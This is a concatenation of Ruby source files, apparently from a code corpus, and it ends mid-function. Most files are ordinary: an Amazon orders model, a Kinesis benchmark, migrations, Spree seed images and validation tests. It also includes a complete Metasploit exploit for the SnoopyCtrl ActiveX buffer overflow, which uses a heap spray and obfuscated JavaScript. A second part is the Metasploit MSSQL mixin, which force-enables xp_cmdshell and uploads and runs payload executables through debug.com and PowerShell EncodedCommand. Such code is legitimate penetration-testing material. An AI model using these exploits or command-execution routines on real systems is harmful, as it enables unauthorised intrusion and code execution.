self.shipping_address = attributes[:'shipping_address']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @amazon_order_id.nil?
invalid_properties.push('invalid value for "amazon_order_id", amazon_order_id cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @amazon_order_id.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
amazon_order_id == o.amazon_order_id &&
shipping_address == o.shipping_address
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[amazon_order_id, shipping_address].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::OrdersApiModel.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 31.811659 | 247 | 0.639132 |
d587b59c651614f19ef5febd1c85606455633138 | 38 | module Rolify
VERSION = "3.4.0"
end
| 9.5 | 19 | 0.657895 |
084d70fc2043f3423a6acc4b29123fb28a71301e | 448 | Pod::Spec.new do |s|
s.name = 'Colours'
s.version = '0.0.1'
s.summary = '100s of beautiful, predefined UIColors and UIColor methods.'
s.author = {
'Ben Gordon' => 'brgordon@ua.edu'
}
s.source = {
:git => 'https://github.com/bennyguitar/Colours-for-iOS.git',
:commit => '916c095'
}
s.homepage = 'http://subvertapps.com'
s.license = 'LICENSE'
s.source_files = '*.{h,m}'
s.platform = :ios
end | 28 | 80 | 0.578125 |
bb8a91bfa8fc5a6544f34e4d6e60a55a69cef6ce | 2,817 | #
# Copyright 2014-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require_relative '../test/helper'
require 'fluent/plugin/out_kinesis_streams'
require 'fluent/plugin/out_kinesis_streams_aggregated'
require 'fluent/plugin/out_kinesis_firehose'
require 'benchmark'
require 'net/empty_port'
namespace :benchmark do
task :local do
KinesisBenchmark.new.run
end
task :remote do
KinesisBenchmark.new(false).run
end
end
class KinesisBenchmark
def initialize(local = true)
@local = local
Fluent::Test.setup
end
def run
setup
benchmark(ENV['SIZE'] || 100, ENV['COUNT'] || 10000)
teardown
end
def setup
return if not @local
@port = Net::EmptyPort.empty_port
@server_pid = fork do
Process.setsid
server = DummyServer.start(port: @port)
Signal.trap("TERM") do
server.shutdown
end
server.thread.join
end
Net::EmptyPort.wait(@port, 3)
end
def teardown
return if not @local
Process.kill "TERM", @server_pid
Process.waitpid @server_pid
end
def default_config
conf = %[
log_level error
region ap-northeast-1
data_key a
]
if @local
conf += %[
endpoint https://localhost:#{@port}
ssl_verify_peer false
]
end
conf
end
def create_driver(type, conf = default_config)
klass = case type
when :streams
Fluent::KinesisStreamsOutput
when :streams_aggregated
Fluent::KinesisStreamsAggregatedOutput
when :firehose
Fluent::KinesisFirehoseOutput
end
conf += case type
when :streams, :streams_aggregated
"stream_name fluent-plugin-test"
when :firehose
"delivery_stream_name fluent-plugin-test"
end
if fluentd_v0_12?
Fluent::Test::BufferedOutputTestDriver.new(klass) do
end.configure(conf)
else
Fluent::Test::Driver::Output.new(klass) do
end.configure(conf)
end
end
def benchmark(size, count)
record = {"a"=>"a"*size}
Benchmark.bmbm(20) do |x|
[:streams_aggregated, :streams, :firehose].each do |type|
x.report(type) { driver_run(create_driver(type), count.times.map{|i|record}) }
end
end
end
end
| 25.378378 | 88 | 0.656372 |
39fe9968776a9e148bbdb9a0c020c120a4589ccb | 163 | class LessonWordSynonym < ActiveRecord::Base
belongs_to :lesson_word
belongs_to :synonym
validates_uniqueness_of :lesson_word_id, :scope => :synonym_id
end
| 23.285714 | 64 | 0.803681 |
1ca7185045053d30d164cf68661b04f00dd03d74 | 338 | class AddExifTagToCaptureDeviceMakerAndModel < ActiveRecord::Migration
def self.up
add_column :capture_device_makers, :exif_tag, :string
add_column :capture_device_models, :exif_tag, :string
end
def self.down
remove_column :capture_device_makers, :exif_tag
remove_column :capture_device_models, :exif_tag
end
end
| 28.166667 | 70 | 0.789941 |
870016258ffbb7257fca052a8353048098d2a5f0 | 580 | # frozen_string_literal: true
module RuboCop
module Cop
module SketchupDeprecations
# Method is deprecated. Use `SKETCHUP_CONSOLE.show` instead.
class ShowRubyPanel < SketchUp::Cop
MSG = 'Method is deprecated. Use `SKETCHUP_CONSOLE.show` '\
'instead.'.freeze
def_node_matcher :show_ruby_panel?, <<-PATTERN
(send nil? :show_ruby_panel)
PATTERN
def on_send(node)
return unless show_ruby_panel?(node)
add_offense(node, location: :expression)
end
end
end
end
end
| 22.307692 | 67 | 0.632759 |
bb702e325e3e49ef4939c7fa5d86ea4d5ed67709 | 498 | class GravatarUrlBuilder
attr_reader :user, :size
private :user, :size
def initialize(user, size)
@user, @size = user, size
end
def url
"http://www.gravatar.com/avatar/#{gravatar_hash}?s=#{size}&d=#{default_url}"
end
private
def gravatar_hash
Digest::MD5.hexdigest(sanitised_user_email)
end
def sanitised_user_email
user.email.strip.downcase
end
def default_url
"http://www.gravatar.com/avatar/436053b3e050d4156773bc04cfb167fe?s=#{size}"
end
end
| 18.444444 | 80 | 0.708835 |
4a48b7a50c6d6cf759fa21b13309f8b5ebe88b8f | 6,232 | unless ENV['SKIP_SAMPLE_IMAGES']
Spree::Sample.load_sample('products')
Spree::Sample.load_sample('variants')
products = {}
products[:ror_baseball_jersey] = Spree::Product.find_by!(name: 'Ruby on Rails Baseball Jersey')
products[:ror_tote] = Spree::Product.find_by!(name: 'Ruby on Rails Tote')
products[:ror_bag] = Spree::Product.find_by!(name: 'Ruby on Rails Bag')
products[:ror_jr_spaghetti] = Spree::Product.find_by!(name: 'Ruby on Rails Jr. Spaghetti')
products[:ror_mug] = Spree::Product.find_by!(name: 'Ruby on Rails Mug')
products[:ror_ringer] = Spree::Product.find_by!(name: 'Ruby on Rails Ringer T-Shirt')
products[:ror_stein] = Spree::Product.find_by!(name: 'Ruby on Rails Stein')
products[:spree_baseball_jersey] = Spree::Product.find_by!(name: 'Spree Baseball Jersey')
products[:spree_stein] = Spree::Product.find_by!(name: 'Spree Stein')
products[:spree_jr_spaghetti] = Spree::Product.find_by!(name: 'Spree Jr. Spaghetti')
products[:spree_mug] = Spree::Product.find_by!(name: 'Spree Mug')
products[:spree_ringer] = Spree::Product.find_by!(name: 'Spree Ringer T-Shirt')
products[:spree_tote] = Spree::Product.find_by!(name: 'Spree Tote')
products[:spree_bag] = Spree::Product.find_by!(name: 'Spree Bag')
products[:ruby_baseball_jersey] = Spree::Product.find_by!(name: 'Ruby Baseball Jersey')
products[:apache_baseball_jersey] = Spree::Product.find_by!(name: 'Apache Baseball Jersey')
def image(name, type = 'jpeg')
images_path = Pathname.new(File.dirname(__FILE__)) + 'images'
path = images_path + file_name(name, type)
return false unless File.exist?(path)
File.open(path)
end
def file_name(name, type = 'jpeg')
"#{name}.#{type}"
end
def attach_paperclip_image(variant, name, type)
if variant.images.where(attachment_file_name: file_name(name, type)).none?
image = image(name, type)
variant.images.create!(attachment: image)
end
end
def attach_active_storage_image(variant, name, type)
if variant.images.with_attached_attachment.where(active_storage_blobs: { filename: file_name(name, type) }).none?
image = image(name, type)
variant.images.create!(attachment: { io: image, filename: file_name(name, type) })
end
end
images = {
products[:ror_tote].master => [
{
name: file_name('ror_tote'),
attachment: image('ror_tote')
},
{
name: file_name('ror_tote_back'),
attachment: image('ror_tote_back')
}
],
products[:ror_bag].master => [
{
name: file_name('ror_bag'),
attachment: image('ror_bag')
}
],
products[:ror_baseball_jersey].master => [
{
name: file_name('ror_baseball'),
attachment: image('ror_baseball')
},
{
name: file_name('ror_baseball_back'),
attachment: image('ror_baseball_back')
}
],
products[:ror_jr_spaghetti].master => [
{
name: file_name('ror_jr_spaghetti'),
attachment: image('ror_jr_spaghetti')
}
],
products[:ror_mug].master => [
{
name: file_name('ror_mug'),
attachment: image('ror_mug')
},
{
name: file_name('ror_mug_back'),
attachment: image('ror_mug_back')
}
],
products[:ror_ringer].master => [
{
name: file_name('ror_ringer'),
attachment: image('ror_ringer')
},
{
name: file_name('ror_ringer_back'),
attachment: image('ror_ringer_back')
}
],
products[:ror_stein].master => [
{
name: file_name('ror_stein'),
attachment: image('ror_stein')
},
{
name: file_name('ror_stein_back'),
attachment: image('ror_stein_back')
}
],
products[:apache_baseball_jersey].master => [
{
name: file_name('apache_baseball', 'png'),
attachment: image('apache_baseball', 'png')
}
],
products[:ruby_baseball_jersey].master => [
{
name: file_name('ruby_baseball', 'png'),
attachment: image('ruby_baseball', 'png')
}
],
products[:spree_bag].master => [
{
name: file_name('spree_bag'),
attachment: image('spree_bag')
}
],
products[:spree_tote].master => [
{
name: file_name('spree_tote_front'),
attachment: image('spree_tote_front')
},
{
name: file_name('spree_tote_back'),
attachment: image('spree_tote_back')
}
],
products[:spree_ringer].master => [
{
name: file_name('spree_ringer_t'),
attachment: image('spree_ringer_t')
},
{
name: file_name('spree_ringer_t_back'),
attachment: image('spree_ringer_t_back')
}
],
products[:spree_jr_spaghetti].master => [
{
name: file_name('spree_spaghetti'),
attachment: image('spree_spaghetti')
}
],
products[:spree_baseball_jersey].master => [
{
name: file_name('spree_jersey'),
attachment: image('spree_jersey')
},
{
name: file_name('spree_jersey_back'),
attachment: image('spree_jersey_back')
}
],
products[:spree_stein].master => [
{
name: file_name('spree_stein'),
attachment: image('spree_stein')
},
{
name: file_name('spree_stein_back'),
attachment: image('spree_stein_back')
}
],
products[:spree_mug].master => [
{
name: file_name('spree_mug'),
attachment: image('spree_mug')
},
{
name: file_name('spree_mug_back'),
attachment: image('spree_mug_back')
}
]
}
products[:ror_baseball_jersey].variants.each do |variant|
color = variant.option_value('tshirt-color').downcase
attach_active_storage_image(variant, "ror_baseball_jersey_#{color}", 'png')
attach_active_storage_image(variant, "ror_baseball_jersey_back_#{color}", 'png')
end
images.each do |variant, attachments|
puts "Loading images for #{variant.product.name}"
attachments.each do |attrs|
name, type = attrs.delete(:name).split('.')
attach_active_storage_image(variant, name, type)
end
end
end
| 30.851485 | 117 | 0.618421 |
f893fba3920db8c7d308d24229e170bde20ff07a | 2,905 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl
ActiveX Control (NPSnpy.dll 1.1.0.36. When sending an overly long
string to the CheckRequirements() method, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'CVE', '2007-4466' ],
[ 'OSVDB', '37723'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]
],
'DisclosureDate' => 'Oct 8 2007',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or al, 12").encode_string * 2)
js = %Q|
try {
var evil_string = "";
var index;
var vulnerable = new ActiveXObject('SnoopyX.SnoopyCtrl.1');
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), 0x0c0c0c0c, 0x40000);
for (index = 0; index < 5000; index++) {
evil_string = evil_string + my_unescape('#{ret}');
}
vulnerable.CheckRequirements(evil_string);
} catch( e ) { window.location = 'about:blank' ; }
|
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => [
'vulnerable',
'shellcode',
'my_unescape',
'index',
'evil_string',
]
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.update_opts(js_heap_spray.opts)
js.obfuscate()
content = %Q|<html>
<body>
<script><!--
#{js}
//</script>
</body>
</html>
|
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end
| 26.171171 | 107 | 0.554217 |
08000590e230654f81efefece65f7e5ab5cb80ca | 4,541 | require File.dirname(__FILE__) + '/../test/test_helper'
class LiveValidationTest < ActiveRecord::TestCase
def setup
Resource.class_eval do # reset live validations
@live_validations = {}
end
end
def test_live_validations_accessor
assert_kind_of(Hash, Resource.live_validations)
end
def test_without_validations
assert_equal({}, Resource.live_validations)
end
def test_without_ok_message
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank"
end
assert_equal("", Resource.live_validations[:name][:presence][:validMessage])
end
def test_with_ok_message
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank", :validMessage => 'thank you!'
end
assert_equal("thank you!", Resource.live_validations[:name][:presence][:validMessage])
end
def test_presence
Resource.class_eval do
validates_presence_of :name, :message => "can't be blank"
end
assert_equal("can't be blank", Resource.live_validations[:name][:presence][:failureMessage])
end
def test_presence_more_than_one_attribute
Resource.class_eval do
validates_presence_of :name, :amount, :message => "can't be blank"
end
assert_equal("can't be blank", Resource.live_validations[:name][:presence][:failureMessage])
assert_equal("can't be blank", Resource.live_validations[:amount][:presence][:failureMessage])
end
def test_numericality
Resource.class_eval do
validates_numericality_of :amount, :message => "isn't a valid number"
end
assert_equal("isn't a valid number", Resource.live_validations[:amount][:numericality][:notANumberMessage])
assert(!Resource.live_validations[:amount][:numericality][:onlyInteger])
end
def test_numericality_only_integer
Resource.class_eval do
validates_numericality_of :amount, :only_integer => true, :message => "isn't an integer number"
end
assert_equal("isn't an integer number", Resource.live_validations[:amount][:numericality][:notAnIntegerMessage])
assert(Resource.live_validations[:amount][:numericality][:onlyInteger])
end
def test_format
Resource.class_eval do
validates_format_of :name, :with => /^\w+$/, :message => "only letters are accepted"
end
assert_equal("only letters are accepted", Resource.live_validations[:name][:format][:failureMessage])
assert_equal(/^\w+$/, Resource.live_validations[:name][:format][:pattern])
end
def test_length_max
Resource.class_eval do
validates_length_of :name, :maximum => 10, :message => "must be under 10 characters long"
end
assert_equal("must be under 10 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(10, Resource.live_validations[:name][:length][:maximum])
end
def test_length_min
Resource.class_eval do
validates_length_of :name, :minimum => 4, :message => "must be more than 4 characters long"
end
assert_equal("must be more than 4 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(4, Resource.live_validations[:name][:length][:minimum])
end
def test_length_range
Resource.class_eval do
validates_length_of :name, :in => 4..10, :message => "must be between 4 and 10 characters long"
end
assert_equal("must be between 4 and 10 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(4, Resource.live_validations[:name][:length][:minimum])
assert_equal(10, Resource.live_validations[:name][:length][:maximum])
assert_nil(Resource.live_validations[:name][:length][:in])
end
def test_length_exact
Resource.class_eval do
validates_length_of :name, :is => 5, :message => "must be 5 characters long"
end
assert_equal("must be 5 characters long", Resource.live_validations[:name][:length][:failureMessage])
assert_equal(5, Resource.live_validations[:name][:length][:is])
end
def test_acceptance
Resource.class_eval do
validates_acceptance_of :conditions, :message => "you must accept conditions"
end
assert_equal("you must accept conditions", Resource.live_validations[:conditions][:acceptance][:failureMessage])
end
def test_confirmation
Resource.class_eval do
validates_confirmation_of :name, :message => "doesn't match"
end
assert_equal("doesn't match", Resource.live_validations[:name][:confirmation][:failureMessage])
end
end
| 37.528926 | 120 | 0.723849 |
ff202a6cd79802056fbe8e120dd58a9fc7055d72 | 486 | # frozen_string_literal: true
require 'sauce_bindings'
require 'rspec'
describe 'Create Session' do
it 'starts session' do
# 1. Create Session object with the defaults
session = SauceBindings::Session.new
# 2. Start Session to get the Driver
driver = session.start
# 3. Use the driver in your tests just like normal
driver.get('https://www.saucedemo.com/')
# 4. Stop the Session with whether the test passed or failed
session.stop(true)
end
end
| 23.142857 | 64 | 0.705761 |
6a5b5d0e7ce572545fbb7e1c40d1fa7de7486a17 | 26,190 | # -*- coding: binary -*-
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
module Msf
###
#
# This module exposes methods for querying a remote MSSQL service
#
###
module Exploit::Remote::MSSQL
include Exploit::Remote::MSSQL_COMMANDS
include Exploit::Remote::Udp
include Exploit::Remote::Tcp
include Exploit::Remote::NTLM::Client
# Encryption
ENCRYPT_OFF = 0x00 #Encryption is available but off.
ENCRYPT_ON = 0x01 #Encryption is available and on.
ENCRYPT_NOT_SUP = 0x02 #Encryption is not available.
ENCRYPT_REQ = 0x03 #Encryption is required.
# Packet Type
TYPE_SQL_BATCH = 1 # (Client) SQL command
TYPE_PRE_TDS7_LOGIN = 2 # (Client) Pre-login with version < 7 (unused)
TYPE_RPC = 3 # (Client) RPC
TYPE_TABLE_RESPONSE = 4 # (Server) Pre-Login Response ,Login Response, Row Data, Return Status, Return Parameters,
# Request Completion, Error and Info Messages, Attention Acknowledgement
TYPE_ATTENTION_SIGNAL = 6 # (Client) Attention
TYPE_BULK_LOAD = 7 # (Client) SQL Command with binary data
TYPE_TRANSACTION_MANAGER_REQUEST = 14 # (Client) Transaction request manager
TYPE_TDS7_LOGIN = 16 # (Client) Login
TYPE_SSPI_MESSAGE = 17 # (Client) Login
TYPE_PRE_LOGIN_MESSAGE = 18 # (Client) pre-login with version > 7
# Status
STATUS_NORMAL = 0x00
STATUS_END_OF_MESSAGE = 0x01
STATUS_IGNORE_EVENT = 0x02
STATUS_RESETCONNECTION = 0x08 # TDS 7.1+
STATUS_RESETCONNECTIONSKIPTRAN = 0x10 # TDS 7.3+
#
# Creates an instance of a MSSQL exploit module.
#
def initialize(info = {})
super
# Register the options that all MSSQL exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(1433),
OptString.new('USERNAME', [ false, 'The username to authenticate as', 'sa']),
OptString.new('PASSWORD', [ false, 'The password for the specified username', '']),
OptBool.new('TDSENCRYPTION', [ true, 'Use TLS/SSL for TDS data "Force Encryption"', false]),
OptBool.new('USE_WINDOWS_AUTHENT', [ true, 'Use windows authentification (requires DOMAIN option set)', false]),
], Msf::Exploit::Remote::MSSQL)
register_advanced_options(
[
OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
]),
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)
register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
end
#
# This method sends a UDP query packet to the server and
# parses out the reply packet into a hash
#
def mssql_ping(timeout=5)
data = { }
ping_sock = Rex::Socket::Udp.create(
'PeerHost' => rhost,
'PeerPort' => 1434,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
ping_sock.put("\x02")
resp, _saddr, _sport = ping_sock.recvfrom(65535, timeout)
ping_sock.close
return data if not resp
return data if resp.length == 0
return mssql_ping_parse(resp)
end
#
# Parse a 'ping' response and format as a hash
#
def mssql_ping_parse(data)
res = []
var = nil
idx = data.index('ServerName')
return res if not idx
sdata = data[idx, (data.length - 1)]
instances = sdata.split(';;')
instances.each do |instance|
rinst = {}
instance.split(';').each do |d|
if (not var)
var = d
else
if (var.length > 0)
rinst[var] = d
var = nil
end
end
end
res << rinst
end
return res
end
#
# Execute a system command via xp_cmdshell
#
def mssql_xpcmdshell(cmd, doprint=false, opts={})
force_enable = false
begin
res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", false, opts)
if res[:errors] && !res[:errors].empty?
if res[:errors].join =~ /xp_cmdshell/
if force_enable
print_error("The xp_cmdshell procedure is not available and could not be enabled")
raise RuntimeError, "Failed to execute command"
else
print_status("The server may have xp_cmdshell disabled, trying to enable it...")
mssql_query(mssql_xpcmdshell_enable())
raise RuntimeError, "xp_cmdshell disabled"
end
end
end
mssql_print_reply(res) if doprint
return res
rescue RuntimeError => e
if e.to_s =~ /xp_cmdshell disabled/
force_enable = true
retry
end
raise e
end
end
#
# Upload and execute a Windows binary through MSSQL queries
#
def mssql_upload_exec(exe, debug=false)
hex = exe.unpack("H*")[0]
var_bypass = rand_text_alpha(8)
var_payload = rand_text_alpha(8)
print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
print_status("Writing the debug.com loader to the disk...")
h2b = File.read(datastore['HEX2BINARY'], File.size(datastore['HEX2BINARY']))
h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
h2b.split(/\n/).each do |line|
mssql_xpcmdshell("#{line}", false)
end
print_status("Converting the debug script to an executable...")
mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)
print_status("Uploading the payload, please be patient...")
idx = 0
cnt = 500
while(idx < hex.length - 1)
mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
idx += cnt
end
print_status("Converting the encoded payload...")
mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
print_status("Executing the payload...")
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
end
#
# Upload and execute a Windows binary through MSSQL queries and Powershell
#
def powershell_upload_exec(exe, debug=false)
# hex converter
hex = exe.unpack("H*")[0]
# create random alpha 8 character names
#var_bypass = rand_text_alpha(8)
var_payload = rand_text_alpha(8)
print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
# our payload converter, grabs a hex file and converts it to binary for us through powershell
h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
h2b_unicode=Rex::Text.to_unicode(h2b)
# base64 encode it, this allows us to perform execution through powershell without registry changes
h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
print_status("Uploading the payload #{var_payload}, please be patient...")
idx = 0
cnt = 500
while(idx < hex.length - 1)
mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
idx += cnt
end
print_status("Converting the payload utilizing PowerShell EncodedCommand...")
mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
print_status("Executing the payload...")
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
print_status("Be sure to cleanup #{var_payload}.exe...")
end
#
# Send and receive using TDS
#
def mssql_send_recv(req, timeout=15, check_status = true)
sock.put(req)
# Read the 8 byte header to get the length and status
# Read the length to get the data
# If the status is 0, read another header and more data
done = false
resp = ""
while(not done)
head = sock.get_once(8, timeout)
if !(head && head.length == 8)
return false
end
# Is this the last buffer?
if(head[1, 1] == "\x01" or not check_status )
done = true
end
# Grab this block's length
rlen = head[2, 2].unpack('n')[0] - 8
while(rlen > 0)
buff = sock.get_once(rlen, timeout)
return if not buff
resp << buff
rlen -= buff.length
end
end
resp
end
#
# Encrypt a password according to the TDS protocol (encode)
#
def mssql_tds_encrypt(pass)
# Convert to unicode, swap 4 bits both ways, xor with 0xa5
Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
end
#
#this method send a prelogin packet and check if encryption is off
#
def mssql_prelogin(enc_error=false)
pkt = ""
pkt_hdr = ""
pkt_data_token = ""
pkt_data = ""
pkt_hdr = [
TYPE_PRE_LOGIN_MESSAGE, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
0x00, # PacketID
0x00 #Window
]
version = [0x55010008, 0x0000].pack("Vv")
encryption = ENCRYPT_NOT_SUP # off
instoptdata = "MSSQLServer\0"
threadid = "\0\0" + Rex::Text.rand_text(2)
idx = 21 # size of pkt_data_token
pkt_data_token << [
0x00, # Token 0 type Version
idx, # VersionOffset
version.length, # VersionLength
0x01, # Token 1 type Encryption
idx = idx + version.length, # EncryptionOffset
0x01, # EncryptionLength
0x02, # Token 2 type InstOpt
idx = idx + 1, # InstOptOffset
instoptdata.length, # InstOptLength
0x03, # Token 3 type Threadid
idx + instoptdata.length, # ThreadIdOffset
0x04, # ThreadIdLength
0xFF
].pack("CnnCnnCnnCnnC")
pkt_data << pkt_data_token
pkt_data << version
pkt_data << encryption
pkt_data << instoptdata
pkt_data << threadid
pkt_hdr[2] = pkt_data.length + 8
pkt = pkt_hdr.pack("CCnnCC") + pkt_data
resp = mssql_send_recv(pkt)
idx = 0
while resp && resp[0, 1] != "\xff" && resp.length > 5
token = resp.slice!(0, 5)
token = token.unpack("Cnn")
idx -= 5
if token[0] == 0x01
idx += token[1]
break
end
end
if idx > 0
encryption_mode = resp[idx, 1].unpack("C")[0]
else
# force to ENCRYPT_NOT_SUP and hope for the best
encryption_mode = ENCRYPT_NOT_SUP
end
if encryption_mode != ENCRYPT_NOT_SUP && enc_error
raise RuntimeError,"Encryption is not supported"
end
encryption_mode
end
#
# This method connects to the server over TCP and attempts
# to authenticate with the supplied username and password
# The global socket is used and left connected after auth
#
def mssql_login(user='sa', pass='', db='')
disconnect if self.sock
connect
begin
# Send a prelogin packet and check that encryption is not enabled
if mssql_prelogin != ENCRYPT_NOT_SUP
print_error('Encryption is not supported')
return false
end
rescue EOFError
print_error('Probable server or network failure')
return false
end
if datastore['USE_WINDOWS_AUTHENT']
idx = 0
pkt = ''
pkt_hdr = ''
pkt_hdr = [
TYPE_TDS7_LOGIN, #type
STATUS_END_OF_MESSAGE, #status
0x0000, #length
0x0000, # SPID
0x01, # PacketID (unused upon specification
# but ms network monitor stil prefer 1 to decode correctly, wireshark don't care)
0x00 #Window
]
pkt << [
0x00000000, # Size
0x71000001, # TDS Version
0x00000000, # Dummy Size
0x00000007, # Version
rand(1024+1), # PID
0x00000000, # ConnectionID
0xe0, # Option Flags 1
0x83, # Option Flags 2
